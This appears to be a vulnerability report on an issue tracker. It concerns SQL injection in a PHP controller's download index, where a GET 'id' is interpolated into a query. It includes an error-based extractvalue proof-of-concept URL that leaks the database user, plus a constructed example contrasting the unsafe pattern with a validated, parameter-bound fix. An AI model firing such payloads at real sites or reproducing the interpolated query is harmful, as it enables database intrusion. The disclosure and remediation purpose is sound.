\App\Manage\Controller\DownloadController.class.php has SQL injection #8

Open
@maoqingya

\App\Manage\Controller\DownloadController.class.php
line: 18 - 21
public function index(){
    // Query the column information for the given id
    $id=I('get.id'); // category ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();

POC:
http://127.0.0.1/index.php/Download/Index/Column?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))
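
The pattern reported above, next to a hardened form, as an added example that is not part of the issue or the project's code. The table `demo_column`, its rows, the function names and the sample inputs are constructed, and SQLite in memory stands in for the application's database.

```php
<?php
// Added example, not project code. Table and rows are constructed; SQLite
// in-memory stands in for the application's database so this runs offline.
function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE demo_column (id INTEGER PRIMARY KEY, name TEXT, column_sort INTEGER)');
    $pdo->exec("INSERT INTO demo_column VALUES (1, 'Drivers', 2), (2, 'Manuals', 1)");
    return $pdo;
}

// Pattern from the report: the raw request value becomes part of the SQL text.
function build_query_unsafe(string $rawId): string
{
    return "SELECT * FROM demo_column WHERE id=$rawId ORDER BY column_sort";
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function find_column_safe(PDO $pdo, string $rawId): array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT id, name FROM demo_column WHERE id = :id ORDER BY column_sort');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = open_demo_db();
// Constructed inputs: a valid id, a value carrying extra SQL, and an empty value.
foreach (['1', '1 and 1=1', ''] as $raw) {
    printf("input %s\n  concatenated SQL: %s\n", var_export($raw, true), build_query_unsafe($raw));
    try {
        printf("  hardened result:  %s\n", json_encode(find_column_safe($pdo, $raw)));
    } catch (InvalidArgumentException $e) {
        printf("  hardened result:  rejected (%s)\n", $e->getMessage());
    }
}
```

In the controller from the report, the equivalent change is to cast the value when it is read and to drop the interpolated string condition, for example `I('get.id', 0, 'intval')` with `where(array('id' => $id))`. That assumes the ThinkPHP 3.2 helpers that `I()` and `M()` appear to be.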
